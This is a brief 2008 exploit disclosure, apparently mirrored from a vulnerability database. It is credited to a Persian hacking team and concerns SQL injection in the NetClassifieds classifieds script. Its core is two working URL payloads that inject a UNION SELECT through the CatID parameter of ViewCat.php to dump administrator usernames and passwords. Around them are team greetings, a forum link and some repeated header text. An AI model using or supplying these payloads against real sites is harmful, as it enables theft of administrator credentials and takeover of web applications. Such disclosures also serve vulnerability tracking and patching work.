NetClassifieds Sql Injection

2008-04-2400:00:00

vulners.com

JSON

Aria-Security Team (Persian Security Team)
http://Aria-Security.Net (Persian)
http://Aria-Security.com (ENG)

Greetz: Aura, imm02tal, Null, Kinglet, Mormoroth
http://www.scriptdevelopers.net/ (tested on NetClassifieds)
Original Post @ http://forum.aria-security.com/showthread.php?p=107#

ViewCat.php?CatID=-1//union//select//1,username,3//from//administrators/*
ViewCat.php?CatID=-1//union//select//1,2,user_passowrd//from//administrators/*

Note: other NetClassfields Product maybe vulnerable with the same vuln.

Regards,
The-0utl4w

JSON

NetClassifieds Sql Injection

Aria-Security Team (Persian Security Team) http://Aria-Security.Net (Persian) http://Aria-Security.com (ENG)

Aria-Security Team (Persian Security Team)
http://Aria-Security.Net (Persian)
http://Aria-Security.com (ENG)